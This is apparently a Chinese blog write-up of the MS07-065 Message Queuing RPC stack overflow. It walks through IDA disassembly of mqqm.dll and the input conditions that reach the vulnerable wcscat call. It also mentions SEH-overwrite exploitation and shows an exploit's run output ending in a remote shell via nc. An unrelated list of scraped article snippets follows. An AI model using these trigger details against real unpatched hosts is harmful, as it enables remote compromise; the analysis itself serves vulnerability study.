linkboy2004
linkboy2004

MS07-065 Message Queuing Service RPC远程溢出分析

导读:
  漏洞是在UUID fdb3a030-065f-11d1-bb9b-00a024ea5525 的第6个调用引起的。最终通过一个 wcscat()的拷贝造成一个栈溢出.
  查找了一下关于这个接口的一些定义
  http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msmq.html
  The Message Queuing service (msmq) runs RPC services, listening on the ncacn_ip_tcptransport. By default, the msmq services opens 4 TCP ports [81], including one or several of 2101/tcp, 2103/tcp, 2105/tcp and 2107/tcp.
  The mqqm.dll(Windows NT MQ Queue Manager) DLL, loaded in the mqsvc.exeprocess, contains the following RPC services:
  fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
  76d12b80-3467-11d3-91ff-0090272f9ea3 v1.0
  1088a980-eae5-11d0-8d9b-00a02453c337 v1.0
  5b5b3580-b0e0-11d1-b92d-0060081e87f0 v1.0
  41208ee0-e970-11d1-9b9e-00e02c064c39 v1.0
   Table 4.49. qmcomm operations
   Interface       Operation number       Operation name
  fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0: qmcomm
  0x00             QMOpenQueue
  0x01             QMGetRemoteQueueName
  0x02             QMOpenRemoteQueue
  0x03             QMCloseRemoteQueueContext
  0x04             QMCreateRemoteCursor
  0x05             QMSendMessageInternal
  0x06             QMCreateObjectInternal
  。。。。。。
  事实上,这个服务运行在2101、2103、2105、2107端口,根据我后来的结果可以看到,这些端口都能够直接溢出
  这个漏洞被微软标记为important,因为在2003偷偷修复了,在xp和2000 professional版本上,这个漏洞利用时候需要验证用户密码,只有在2000 server上,才能够无须身份验证的触发溢出。
  Windows默认是没有装这个服务的,要安装这个服务可以在添加删除程序里,选择添加windows组件。
  
  
  如果是英文版的系统,那么这里可能叫做 Message Queuing
  安装完之后,可以通过 net start msmq 来启动服务。
  服务的进程是 mqsvc.exe, 而服务是在 mqqm.dll 中,所以我们可以反汇编这个dll文件
  用IDA反汇编mqqm.dll后,用mida插件逆向出RPC调用
  
  
  导出IDL文件后,可以看到函数结构如下:3
  /* opcode: 0x06, address: 0x613B5F03 */
  long _QMCreateObjectInternal (
  [in] long arg_1,
  [in][string] wchar_t * arg_2,
  [in][range(0,524288)] long arg_3,
  [in][unique][size_is(arg_3)] char * arg_4,
  [in][range(1,128)] long arg_5,
  [in][size_is(arg_5)] long arg_6[],
  [in][size_is(arg_5)] struct struct_4 arg_7[]
  );
  这个函数结构暂时先不管他,也可以自己重新构造了一个IDL文件.
  通过IDA看 _QMCreateObjectInternal 函数,没过多久就看出了问题所在
  在 QMCreatePrivateQueue 中的 ReplaceDNSNameWithNetBiosName 中,没有对输入进行充分检查,wcscat()导致了一个栈溢出。
  int __cdecl ReplaceDNSNameWithNetBiosName(wchar_t *Str, wchar_t *Dest)
  ReplaceDNSNameWithNetBiosName@@YAXPBGPAG@Z proc near
  Str= dword ptr 4
  Dest= dword ptr 8
  push esi
  push 5Ch ;Ch
  push [esp+8+Str] ;Str
  call ds:__imp__wcschr
  pop ecx
  mov esi, eax
  pop ecx
  push ?g_szMachineName@@3PAGA ;Source
  push [esp+8+Dest] ;Dest
  call ds:__imp__wcscpy
  pop ecx
  pop ecx
  push esi ;Source
  push [esp+8+Dest] ;Dest
  call ds:__imp__wcscat // 溢出
  pop ecx
  pop ecx
  pop esi
  retn
  ReplaceDNSNameWithNetBiosName@@YAXPBGPAG@Z endp
  伪代码:
  wchar_t *__cdecl ReplaceDNSNameWithNetBiosName(wchar_t *Str, wchar_t *Dest)
  {
  wchar_t *v3; // esi@1
  v3 = _wcschr(Str, 0x5Cu);
  _wcscpy(Dest, g_szMachineName);
  return _wcscat(Dest, v3);
  }
  这里我们后面再回过头来看。
  那么,函数调用是这样的:
  _QMCreateObjectInternal
  |---------------QMCreatePrivateQueue
  |-------------------ReplaceDNSNameWithNetBiosName
  _QMCreateObjectInternal的伪代码为:
  signed int __thiscall QMCreateObjectInternal(struct _RTL_CRITICAL_SECTION *this, RPC_BINDING_HANDLE Binding, unsigned int Type, wchar_t *Str, int a5, int a6, int a7, int a8, int a9)
  {
  __int32 v10; // edi@6
  __int32 v11; // eax@7
  int v12; // ST18_4@9
  struct _RTL_CRITICAL_SECTION *v13; // [sp+4h] [bp-10h]@1
  int v14; // [sp+10h] [bp-4h]@4
  v13 = this;
  if ( a5 &&!a6 )
  {
  LogMsgHR(-1072824314, off_6B27271C, 0x125u);
  return -1072824314;
  }
  v13 = &qmcmd_cs;
  EnterCriticalSection(&qmcmd_cs);
  v14 = 0;
  if ( Type == 1 )
  {
  v12 = 1;
  goto LABEL_14;
  }
  if ( Type == 2 )
  {
  Type = 0;
  v11 = I_RpcBindingInqTransportType(Binding, &Type);
  if ( v11 )
  goto LABEL_20;
  if ( Type == 4 )
  {
  v12 = 0;
  LABEL_14:
  v10 = CQPrivate__QMCreatePrivateQueue(Str, a5, a6, a7, a8, a9, v12);
  goto LABEL_15;
  }
  if ( v11 )
  LABEL_20:
  LogMsgRPCStatus(v11, off_6B27271C, 0x28u);
  LeaveCriticalSection(&qmcmd_cs);
  return -1072824283;
  }
  v10 = -1072824319;
  LABEL_15:
  if ( v10 <0 )
  LogMsgHR(v10, off_6B27271C, 0x32u);
  LeaveCriticalSection(&qmcmd_cs);
  return v10;
  }
  ============= 这是华丽的分割线 ================
  首先要调用到 QMCreatePrivateQueue .
  我们看到以下是依次是 _QMCreateObjectInternal的六个参数
  Type= dword ptr 0Ch
  Str= dword ptr 10h
  arg_C= dword ptr 14h
  arg_10= dword ptr 18h
  arg_14= dword ptr 1Ch
  arg_18= dword ptr 20h
  arg_1C= dword ptr 24h
  看以下代码片段
  loc_6B22555B: ;CCriticalSection qmcmd_cs
  mov esi, offset ?qmcmd_cs@@3VCCriticalSection@@A
  push esi ;lpCriticalSection
  mov [ebp+var_10], esi
  call ds:__imp__EnterCriticalSection@4 ;EnterCriticalSection(x)
  mov eax, [ebp+Type]
  mov [ebp+var_4], ebx
  dec eax
  jz short loc_6B2255C1
  在代码中,如果eax为1,dec eax后条件为真,会跳转到QMCreatePrivateQueue 去执行
  而eax是由mov eax, [ebp+Type]传入的
  所以要让流程走到QMCreatePrivateQueue
  _QMCreateObjectInternal的第一个参数必须是为0x00000001
  以下是 QMCreatePrivateQueue的调用
  loc_6B2255C3: ;int
  push [ebp+arg_1C]
  mov ecx, offset ?g_QPrivate@@3VCQPrivate@@A ;CQPrivate g_QPrivate
  push [ebp+arg_18] ;int
  push [ebp+arg_14] ;int
  push [ebp+arg_10] ;int
  push [ebp+arg_C] ;int
  push [ebp+Str] ;Str
  call ?QMCreatePrivateQueue@CQPrivate@@QAEJPBGKPAXKQAKQAUtagPROPVARIANT@@H@Z ;CQPrivate::QMCreatePrivateQueue(ushort const *,ulong,void *,ulong,ulong * const,tagPROPVARIANT * const,int)
  实际上,我们在后面可以看到,漏洞是由于QMCreatePrivateQueue的第一个参数,也就是_QMCreateObjectInternal的第二个参数所造成的。
  进入QMCreatePrivateQueue 之后,我们要调用到 ReplaceDNSNameWithNetBiosName.
  以下是代码片段
  .text:6B2178A9 mov eax, offset sub_6B25BE64
  .text:6B2178AE call __EH_prolog
  .text:6B2178B3 sub esp, 138h
  .text:6B2178B9 push ebx
  .text:6B2178BA push esi
  .text:6B2178BB mov esi, [ebp+8]
  .text:6B2178BE lea eax, [ebp-1Ch]
  .text:6B2178C1 push edi
  .text:6B2178C2 push eax ;int
  .text:6B2178C3 mov [ebp-18h], ecx
  .text:6B2178C6 push esi ;Source
  .text:6B2178C7 call ?IsPathnameForLocalMachine@@YAHPBGPAH@Z ;IsPathnameForLocalMachine(ushort const *,int *)
  .text:6B2178CC xor ebx, ebx ;ebx 清0
  .text:6B2178CE pop ecx
  .text:6B2178CF cmp eax, ebx ;比较ispath函数的返回值
  .text:6B2178D1 pop ecx
  .text:6B2178D2 jnz short loc_6B2178EC ;这里有个判断
  .text:6B2178EC cmp [ebp-1Ch], ebx ;这里有个判断
  .text:6B2178EF jz short loc_6B217906
  .text:6B2178F1 lea eax, [ebp-144h] ;在栈上
  .text:6B2178F7 push eax ;Dest
  .text:6B2178F8 push esi ;Str 我们传入的参数
  .text:6B2178F9 call ?ReplaceDNSNameWithNetBiosName@@YAXPBGPAG@Z ;ReplaceDNSNameWithNetBiosName(ushort const *,ushort *)
  ========== 这是聪明的分割线 ============
  要走到 ReplaceDNSNameWithNetBiosName ,就需要先绕过 IsPathnameForLocalMachine 这个函数。 我在绕过这个函数上走了很多弯路,花了许多功夫。
  看看IsPathnameForLocalMachine函数:
  中间分析过程很多,这里我就拿重要的说
  mov eax, offset sub_6B25D54C
  call __EH_prolog
  sub esp, 204h
  push ebx
  push esi
  lea eax, [ebp+String1]
  push edi
  push eax ;Dest
  push [ebp+Source] ;Source
  call ?ExtractMachineName@@YAXPBGPAG@Z ;ExtractMachineName(ushort const *,ushort *)
  mov eax, [ebp+arg_4]
  pop ecx
  pop ecx
  mov esi, ds:__imp__CompareStringW@24 ;CompareStringW(x,x,x,x,x,x)
  and dword ptr [eax], 0
  push 0FFFFFFFFh ;cchCount2
  push ?g_szMachineName@@3PAGA ;lpString2
  lea eax, [ebp+String1]
  mov edi, 800h
  push 0FFFFFFFFh ;cchCount1
  push eax ;lpString1
  push 1 ;dwCmpFlags
  push edi ;Locale
  call esi ;CompareStringW(x,x,x,x,x,x) ;CompareStringW(x,x,x,x,x,x)
  dec eax
  dec eax
  jnz short loc_6B2344E9
  ExtractMachineName(ushort const *,ushort *) 这个函数把/x5c 就是斜杠前的名字,就是机器名拷贝到某处,所以我们的传入参数里要有斜杠。
  然后CompareStringW(x,x,x,x,x,x) 函数,把我们传入的斜杠前的那部分和 机器名比较,这里机器名是通过
  push ?g_szMachineName@@3PAGA ;lpString2
  取得的,所以是一个定值。
  对比完后,我们要让返回值不能为2,因为要跳转到下面的地方:
  loc_6B2344E9:
  lea eax, [ebp+String1]
  push 2Eh ;Ch
  push eax ;Str
  call ds:__imp__wcschr
  pop ecx
  test eax, eax
  pop ecx
  jz loc_6B2345DD
  这里会把刚才斜杠前的那部分拿来比较,看中间有没有点,我们要让跳转条件非真,所以我们的传入参数中要带一个“.” 就是/x2e
  然后我们控制流程来到
  push ?g_szMachineName@@3PAGA ;Str
  mov ebx, ds:__imp__wcslen
  call ebx ;__imp__wcslen
  pop ecx
  push eax ;cchCount2
  mov eax, ?g_szMachineName@@3PAGA ;ushort * g_szMachineName
  push eax ;lpString2
  push eax ;Str
  call ebx ;__imp__wcslen
  pop ecx
  push eax ;cchCount1
  lea eax, [ebp+String1]
  push eax ;lpString1
  push 1 ;dwCmpFlags
  push edi ;Locale
  call esi ;CompareStringW(x,x,x,x,x,x) ;CompareStringW(x,x,x,x,x,x)
  dec eax
  dec eax
  jnz loc_6B2345DD
  这里再次把机器名和我们传入的参数比较了一次, 这时候要让跳转条件不成立
  流程继续走到
  .text:6B234531 push ?g_szMachineName@@3PAGA ;Str
  .text:6B234537 call ebx ;__imp__wcslen
  .text:6B234539 cmp [ebp+eax*2+String1], 2Eh
  .text:6B234542 pop ecx
  .text:6B234543 jnz loc_6B2345DD
  .text:6B234549 mov eax, ?g_szComputerDnsName@@3V?$AP@G@@A ;AP  .text:6B23454E test eax, eax
  .text:6B234550 jz short loc_6B234570
  .text:6B234552 lea ecx, [ebp+String1]
  .text:6B234558 push ecx ;Str2
  .text:6B234559 push eax ;Str1
  .text:6B23455A call ds:__imp___wcsicmp ;比较字符串
  .text:6B234560 pop ecx
  .text:6B234561 test eax, eax
  .text:6B234563 pop ecx
  .text:6B234564 jnz short loc_6B234570 ;这里不能跳转
  .text:6B234566 mov ecx, [ebp+arg_4]
  .text:6B234569 push 1
  .text:6B23456B pop eax
  .text:6B23456C mov [ecx], eax
  .text:6B23456E jmp short loc_6B2345DF
  注意这里
  mov eax, ?g_szComputerDnsName@@3V?$AP@G@@A ;AP g_szComputerDnsName
  test eax, eax
  jz short loc_6B234570
  这个dns name是从机器中取的
  .text:6B234552 lea ecx, [ebp+String1]
  .text:6B234558 push ecx ;Str2
  .text:6B234559 push eax ;Str1
  .text:6B23455A call ds:__imp___wcsicmp
  然后马上比较两个串是否相同。
  根据我们的流程需要,最后要走到
  mov ecx, [ebp+arg_4]
  push 1
  pop eax
  mov [ecx], eax
  jmp short loc_6B2345DF
  然后这个天杀的 IsPathnameForLocalMachine 就总算返回为真了,而且我们同时绕过了以下两处的判断:
  .text:6B2178CF cmp eax, ebx ;比较ispath函数的返回值
  .text:6B2178D1 pop ecx
  .text:6B2178D2 jnz short loc_6B2178EC ;这里有个判断
  .text:6B2178EC cmp [ebp-1Ch], ebx ;这里有个判断
  .text:6B2178EF jz short loc_6B217906
  从而让函数流程顺利的执行到了 ReplaceDNSNameWithNetBiosName
  小结下绕过 IsPathnameForLocalMachine 的条件:
  1. 要发送个 目标机器的dnsname 加上 一个斜杠 /
  2. 要是unicode字符串发送dnsname
  实际上从 ReplaceDNSNameWithNetBiosName 这个函数的名字也可以看出来,是要把DNS name替换为 机器名。
  同时也可以看出来这个漏洞的利用条件: 需要知道目标机器的dnsname。
  一般如果机器在域里面,那就是域后缀。
  如下图:
  
  
  我的机器名是: a-dda41398f44f4
  DNS后缀是: .fuck
  注意这个“.”很重要,在触发条件中是一定要的。
  ========= 这是要抓狂的分割线 =================
  现在回过头来看 ReplaceDNSNameWithNetBiosName 的代码:
  push esi
  push 5Ch ;Ch
  push [esp+8+Str] ;Str
  call ds:__imp__wcschr
  pop ecx
  mov esi, eax
  pop ecx
  push ?g_szMachineName@@3PAGA ;Source
  push [esp+8+Dest] ;Dest
  call ds:__imp__wcscpy
  pop ecx
  pop ecx
  push esi ;Source
  push [esp+8+Dest] ;Dest
  call ds:__imp__wcscat
  就是把 / 后面的字符串,wcscat到 机器名后面, 而这个拷贝发生在栈上,没有做长度检查,发生了栈溢出。
  最后我使用覆盖seh 的方法利用成功发送超过2000 bytes字节的stub,保证覆盖到栈底触发异常,然后call ebx执行shellcode
  下面是一个装B的exploit,只适用于我的机器(机器名是a-dda41398f44f4 , dns 后缀是.fuck ),如果你要修改,需要考虑到机器名的不同带来的影响,要重新计算payload长度值. 为啥说这是装B的exploit呢,因为明明有更清晰的exploit写法我不写,要写个可以忽悠很多人的。所以说大家要是以前看到过这种exploit写法又看不懂,那不要灰心,那个人只是和我一样在装B而已!
  Exploit运行效果:
  
  
  Shellcode 使用exitthread退出线程,则可以反复溢出,如果使用seh退出,则会反复执行你的shellcode
  ======== 这是装B的分割线 ===============
  /*
  Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
  by axis
  http://www.ph4nt0m.org
  you should know the dnsname of target to trigger this vuln
  the service runs on port 2103/2105/2107
  D:/soft/develop/MyProjects/temp/Debug>temp.exe -h 192.168.152.100 -p 2103
  --------------------------------------------------------------------------
  -== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
  -== code by axis@ph4nt0m ==-
  -== Http://www.ph4nt0m.org ==-
  -== Tested against Windows 2000 server SP4 ==-
  --------------------------------------------------------------------------
  [+] Attacking default port 2103
  [*]Sending our Payload, Good Luck! ^_^
  [*]Sending RPC Bind String!
  [*]Sending RPC Request Now!
  D:/soft/develop/MyProjects/temp/Debug>
  D:/>nc -vv -n 192.168.152.100 1154
  (UNKNOWN) [192.168.152.100] 1154 (?) open: unknown socket error
  Microsoft Windows 2000 [Version 5.00.2195]

你可能感兴趣的:(网络安全技术,service,string,windows,binding,struct,microsoft)

  • C语言开发一个简单的产品入库操作系统 鹿屿二向箔 c语言算法开发语言
    编写一个简单的产品入库操作系统是一个涉及文件操作、用户输入和数据处理的项目。以下是一个基本的C语言示例,它展示了如何创建一个简单的产品入库系统。这个系统将允许用户添加产品信息,并将其存储在文件中。功能描述添加产品信息(产品ID、名称、数量)。将产品信息保存到文件中。从文件中读取并显示所有产品信息。示例代码#include#include#includetypedefstruct{intid;cha
  • Python中的os.path.join() 小小小花儿
    Python中的os.path.join()用于拼接路径名组件。路径组件之间会自动添加‘\’,也可以自己在组件的末尾加上‘\’。1、如果各路径组件名首字母均不包含‘\’,则函数会自动加上。importosa=os.path.join('save','test','1.jpg')print(a)输出:save\test\1.jpg注意:在windows系统中默认添加的是‘\’;在linux系统中,是
  • 一个简单的点歌系统 BABA8891 c语言
    一个简单的点歌系统可以用C语言实现,这里提供一个基本的框架。这个系统可以包括歌曲列表、用户选择歌曲的功能以及播放歌曲的功能。以下是一个示例代码:#include#include#defineMAX_SONGS100#defineMAX_LENGTH100typedefstruct{charname[MAX_LENGTH];charartist[MAX_LENGTH];}Song;typedefst
  • 【深度学习】【OnnxRuntime】【Python】模型转化、环境搭建以及模型部署的详细教程 牙牙要健康 深度学习onnxonnxruntime深度学习python人工智能
    【深度学习】【OnnxRuntime】【Python】模型转化、环境搭建以及模型部署的详细教程提示:博主取舍了很多大佬的博文并亲测有效,分享笔记邀大家共同学习讨论文章目录【深度学习】【OnnxRuntime】【Python】模型转化、环境搭建以及模型部署的详细教程前言模型转换--pytorch转onnxWindows平台搭建依赖环境onnxruntime调用onnx模型ONNXRuntime推理核
  • sdk和ide earlene_wyl
    ide:集成开发环境,是一种辅助程序开发人员开发软件的应用软件。IDE通常包括编程语言编辑器、自动建立工具、通常还包括调试器。有些IDE包含编译器/解释器,如微软的MicrosoftVisualStudio,有些则不包含,如Eclipse、SharpDevelop等,这些IDE是通过调用第三方编译器来实现代码的编译工作的。有时IDE还会包含版本控制系统和一些可以设计图形用户界面的工具。许多支持面向
  • 查看当前计算机CPU架构 raoxiaoya Linuxwindows
    在安装软件的时候,windows上会有32bit,64bit的区别,但是Linux系统下则还需要知道CPU架构,比如amd64,i386,arm64,x86_64,aarch64等等。1、cat/proc/versionLinuxversion3.10.0-1127.10.1.el7.x86_64([email protected])(gccversion4.8.
  • SpringBoot项目 俺叫啥好嘞 spring系列springspringboot
    SpringBoot项目大概分为四层:(1)DAO层:包括XxxMapper.java(数据库访问接口类),XxxMapper.xml(数据库链接实现);(这个命名,有人喜欢用Dao命名,有人喜欢用Mapper,看个人习惯了吧)(2)Bean层:也叫model层,模型层,entity层,实体层,就是数据库表的映射实体类,存放POJO对象;(3)Service层:也叫服务层,业务层,包括XxxSer
  • 开源模型应用落地-qwen2-7b-instruct-LoRA微调-unsloth(让微调起飞)-单机单卡-V100(十七) 开源技术探险家 开源模型-实际应用落地#深度学习语言模型自然语言处理
    一、前言本篇文章将在v100单卡服务器上,使用unsloth去高效微调QWen2系列模型,通过阅读本文,您将能够更好地掌握这些关键技术,理解其中的关键技术要点,并应用于自己的项目中。使用unsloth能够使模型的微调速度提高2-5倍。在处理大规模数据或对时间要求较高的场景下,这可以大大节省微调所需的时间,提高开发效率。其次,可减少80%的内存使用。这对于资源有限的环境或者需要同时运行多个微调任务的
  • react 更新元素状态 叶绿素yls
    所有的react元素都是immutable不可变的。当元素被创建之后,我们无法修改他的内容或属性。根据我们现在所学的react的知识,我们要更新元素的内容,我们必须重新渲染这个元素,也就是重新创建这个元素。看一个例子:functiontick(){constelement=Hello,worldItis{newDate().toLocaleString()}.;ReactDOM.render(el
  • 9.10网络编程(day7) Heart14 网络jvmjava
    #include#includetypedefstruct{intgh;charname[20];doublesalary;}Worker;intdo_insert(sqlite3*ppDb){Workerwork;printf("请输入插入的工号:");scanf("%d",&work.gh);printf("请输入插入的姓名:");scanf("%s",work.name);printf("请
  • [Windows] MinGW 与 MSYS2 ERIC-ZI Windowswindows
    一、MinGW(MinimalistGNUforWindows)MinGW(MinimalistGNUforWindows)是一个专为Windows系统设计的工具集,旨在为Windows开发者提供一个轻量级且高效的GNU工具链。该工具集的核心是GNU编译器集合(GCC),其中包括了支持多种编程语言的编译器,如C、C++和Ada。MinGW的主要目标是让开发者能够在Windows系统上直接编译和运行
  • [INSTALL] MSYS2 -- Windows下的类Linux环境 ERIC-ZI 工具类Windowswindowslinux运维
    一、安装1.从https://www.msys2.org/下载安装msys2也可以从镜像:http://mirrors.aliyun.com/msys2/distrib/x86_64/下载最新的安装包msys2-x86_64-20230718.exe2.更新下载源为阿里云sed-i"s#https\?://mirror.msys2.org/#http://mirrors.aliyun.com/ms
  • Android保存Activity状态 wishes丶啊
    在Activity#onSaveInstanceState()可以对数据进行保存,然后在Activity#onCreate()中获取代码:classMainActivityextendsActivity{@OverrideprotectedvoidonCreate(BundlesavedInstanceState){if(savedInstanceState!=null){Stringname=s
  • java中的ide、sdk是什么,javaee\javase\javame区别 极客Thomas idejavaeclipse
    ide:integrateddevelopmentenvironment集成开发环境简单的来说就是提供编译代码等一系列功能的开发环境比如:eclipsesdk:servicedevelopmentpack服务开发包简单来说就是一些封装的功能代码,做成了一个包,给我们可以直接调用比如jdk1.8jdkjavase(JavaPlatform,StandardEdition)标准版本,在电脑上运行jav
  • 网络编程 9.10 Tangver 数据库
    完成代码剩余功能typedefstruct{intgh;charname[20];doublesalary;}Worker;intdo_insert(sqlite3*ppDb){Workerwork;printf("请输入插入的工号:");scanf("%d",&work.gh);printf("请输入插入的姓名:");scanf("%s",work.name);printf("请输入插入的薪水:
  • Python 安装 Selenium 报错解决方案:全方位排错指南 小柒笔记 pythonselenium开发语言
    引言在尝试使用pip安装Selenium库时,您可能会遇到中断报错,这通常是由于多种原因造成的,如网络问题、权限问题或依赖项缺失等。本文将指导您如何解决这一常见问题。一、检查网络连接首先,确保您的网络连接稳定。pip安装过程中需要从互联网下载包,因此网络不稳定可能导致安装失败。二、使用管理员权限运行在Windows系统中,尝试使用管理员权限运行命令提示符或PowerShell。右键点击命令提示符或
  • 使用vllIm部署大语言模型 添砖JAVA的小墨 机器学习
    使用vllm部署大语言模型一般需要以下步骤:一、准备工作1.系统要求-操作系统:常见的Linux发行版(如Ubuntu、CentOS)或Windows(通过WSL)。-GPU支持:NVIDIAGPU并安装了适当的驱动程序。-足够的内存和存储空间。2.安装依赖-Python3.8及以上版本。-CUDA工具包(根据GPU型号选择合适的版本)。二、安装vllm1.创建虚拟环境(推荐)-使用Conda:c
  • Cocos2d、Cocos2dx、Cocos Creator、Cocos Studio的区别 Thomas游戏圈
    一、Cocos2d和Cocos2dx的区别【开发语言】:Cocos2d是Object-C写的,Cocos2dx是C++写的,支持使用C++、Lua或Java进行开发。【运行平台】:Cocos2d只能在IOS下运行,Cocos2dx是跨平台的,适配iOS、Android、HTML5、Windows和Mac系统,功能侧重于原生移动平台。点击链接加入群聊【Unity/Cocos交流群】【国籍】:Coco
  • Hadoop windows intelij 跑 MR WordCount piziyang12138
    一、软件环境我使用的软件版本如下:IntellijIdea2017.1Maven3.3.9Hadoop分布式环境二、创建maven工程打开Idea,file->new->Project,左侧面板选择maven工程。(如果只跑MapReduce创建java工程即可,不用勾选Creatfromarchetype,如果想创建web工程或者使用骨架可以勾选)image.png设置GroupId和Artif
  • K8S - Volume - NFS 卷的简介和使用 nvd11 K8Skubernetes容器云原生
    在之前的文章里已经介绍了K8S中两个简单卷类型hostpath和emptydirk8s-Volume简介和HostPath的使用K8S-Emptydir-取代ELK使用fluentd构建loggingsaidcar但是这两种卷都有同1个限制,就是依赖于k8snodes的空间如果某个servicepod中需要的volumn空间很大,这时我们就需要考虑网络磁盘方案,其中NAS类型的Volume是常用且
  • Qt框架在跨平台应用开发中的优势 NewmanEdwarda2 qt开发语言
    随着软件技术的不断发展,跨平台应用开发已成为软件开发领域的一个重要趋势。在众多跨平台开发框架中,Qt因其强大的功能和灵活性而备受开发者的青睐。本文将从多个方面详细探讨Qt框架在跨平台应用开发中的优势。一、跨平台兼容性Qt框架最显著的优势之一就是其卓越的跨平台兼容性。Qt支持多种操作系统,包括Windows、Linux、macOS、Android、iOS等,使得开发者能够使用同一套代码库为不同平台开
  • K8S - Emptydir - 取代ELK 使用fluentd 构建logging saidcar nvd11 K8Skubernetes
    由于k8s的无状态service通常部署在多个POD中,实现多实例面向高并发。但是k8s本身并没有提供集中查询多个pod的日志的功能其中1个常见方案就是ELK.本文的方案是利用fluentdsidecar和emptydir把多个pod的日志导向到bigquery的table中。Emptydir的简介Kubernetes中的EmptyDir是一种用于容器之间共享临时存储的空目录卷类型。EmptyDi
  • C#基础知识-.NET,变量,容量单位,数据类型 yi碗汤园 c#开发语言
    目录1.NET简介2.变量1)定义2)声明3)赋值3.容量单位4.数据类型1)整形(整数)2)非整型(小数)3)非数值型本篇文章来分享一下C#的基础知识,主要讲述一下变量和数据类型的相关知识。1.NET简介.NETdonet是Microsoft新一代多语言的开发平台,用于构建和运行应用程序。Unity借助Mono实现跨平台,核心是.NETFramework框架。2.变量1)什么是变量变量是用来存储
  • 2019-04-27 sap install for window 2008 麦兜的刀
    sap安装配置安装介质准备windows2008R2withoutSP16.0安装介质列表安装Java工具安装操作系统补丁配置SWAP交换分区配置主机名开始安装向导运行SAP安装管理器D:\softs\sapcds\IM_WINDOWS_X86_64\sapinst.exe进入安装界面自定义安装参数定义安装参数提示注销,重新登陆回到安装界面注销冲登陆SAP实例号PRD,安装磁盘驱动器R:安装实例名
  • 把html字符串转为可以被js操作的dom 微特尔普拉斯 javascriptwebnodejavascripthtml前端
    在JavaScript中,您可以使用DOMParserAPI将HTML字符串转换为可操作的DOM节点。以下是具体步骤:1.创建DOMParser实例:constparser=newDOMParser();2.使用parseFromString()方法解析HTML字符串:consthtmlString='Hello,world!';constdoc=parser.parseFromString(ht
  • LSP协议被劫持导致不能上网 tgl182 LSP协议
    故障现象:最近有同事电脑浏览器打不开网页,DNS没问题,外网地址可以PING通,本地连接显示正常,登陆QQ显示网络连接超时,打开浏览器不能显示网页,网络丢包率达到了100%,本地连接数据包收到为0,查杀木马、病毒也不能解决问题。原因分析:WinsockLSP全称WindowsSocketLayeredServiceProvider(分层服务提供商),它是Windows底层网络Socker通信需要经
  • 基础-3 hellomyshadow
    异常处理error接口:Go中的一个关于错误处理的标准模式,属于Go内建的接口类型;typeerrorinterface{Error()string}使用方式:import"errors"functest(aint,bint)(valueint,errerror){ifb==0{err=errors.New("0不能作为除数!")return}else{value=a/breturn}}funcm
  • Anaconda 安装与使用教程 寂然如故 python
    Anaconda安装与使用教程目录-[简介](#简介)-[安装Anaconda](#安装anaconda)-[Windows系统](#windows系统)-[macOS系统](#macos系统)-[Linux系统](#linux系统)-[启动AnacondaPrompt(命令行)](#启动anaconda-prompt-命令行)-[创建与管理环境](#创建与管理环境)-[创建环境](#创建环境)-
  • Wi-Fi基础术语 madmanazo Hardware
    AP:accesspoint,即无线接入点,是一个无线网络的创建者,是网络的中心节点;无线路由器就是一个APSTA:station,指每一个连接到无线网络中的终端设备都可以称为一个站点IBSS:IndependentBasicServiceSet,独立基本服务集,IBSS是一种无线拓扑结构,IEEE802.11标准的模式·IBSS模式,又称作独立广播卫星服务,也称为特设模式,是专为点对点连接SSI
  • java:datatimeformat(处理字符串格式问题) StringBuilder(处理字符串)BigDecimal(解决小数失真) 不会编程的阿成 java开发语言
    时间相关的获取方案LocalDate:代表本地的日期(年,月,日,星期)LocalTime:代表本地时间(时,分,秒,纳秒)localDateTime:代表本地日期,时间(年,月,日,星期,时,分,秒,纳秒)importjava.text.SimpleDateFormat;importjava.util.Date;publicclassTimeDemo{publicstaticvoidmain(S
  • Dom 周华华 JavaScripthtml
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
  • 【Spark九十六】RDD API之combineByKey bit1129 spark
    1. combineByKey函数的运行机制   RDD提供了很多针对元素类型为(K,V)的API,这些API封装在PairRDDFunctions类中,通过Scala隐式转换使用。这些API实现上是借助于combineByKey实现的。combineByKey函数本身也是RDD开放给Spark开发人员使用的API之一   首先看一下combineByKey的方法说明:
  • msyql设置密码报错:ERROR 1372 (HY000): 解决方法详解 daizj mysql设置密码
    MySql给用户设置权限同时指定访问密码时,会提示如下错误: ERROR 1372 (HY000): Password hash should be a 41-digit hexadecimal number;   问题原因:你输入的密码是明文。不允许这么输入。   解决办法:用select password('你想输入的密码');查询出你的密码对应的字符串, 然后
  • 路漫漫其修远兮 吾将上下而求索 周凡杨 学习 思索
    王国维在他的《人间词话》中曾经概括了为学的三种境界古今之成大事业、大学问者,罔不经过三种之境界。“昨夜西风凋碧树。独上高楼,望尽天涯路。”此第一境界也。“衣带渐宽终不悔,为伊消得人憔悴。”此第二境界也。“众里寻他千百度,蓦然回首,那人却在灯火阑珊处。”此第三境界也。学习技术,这也是你必须经历的三种境界。第一层境界是说,学习的路是漫漫的,你必须做好充分的思想准备,如果半途而废还不如不要开始。这里,注
  • Hadoop(二)对话单的操作 朱辉辉33 hadoop
    Debug: 1、 A = LOAD '/user/hue/task.txt' USING PigStorage(' ') AS (col1,col2,col3); DUMP A; //输出结果前几行示例: (>ggsnPDPRecord(21),,) (-->recordType(0),,) (-->networkInitiation(1),,)
  • web报表工具FineReport常用函数的用法总结(日期和时间函数) 老A不折腾 finereport报表工具web开发
    web报表工具FineReport常用函数的用法总结(日期和时间函数)   说明:凡函数中以日期作为参数因子的,其中日期的形式都必须是yy/mm/dd。而且必须用英文环境下双引号(" ")引用。   DATE DATE(year,month,day):返回一个表示某一特定日期的系列数。 Year:代表年,可为一到四位数。 Month:代表月份。
  • c++ 宏定义中的##操作符 墙头上一根草 C++
    #与##在宏定义中的--宏展开 #include <stdio.h> #define f(a,b) a##b #define g(a)   #a #define h(a) g(a) int main() {       &nbs
  • 分析Spring源代码之,DI的实现 aijuans springDI源代码
    (转) 分析Spring源代码之,DI的实现 2012/1/3 by tony                 接着上次的讲,以下这个sample [java]  view plain copy print
  • for循环的进化 alxw4616 JavaScript
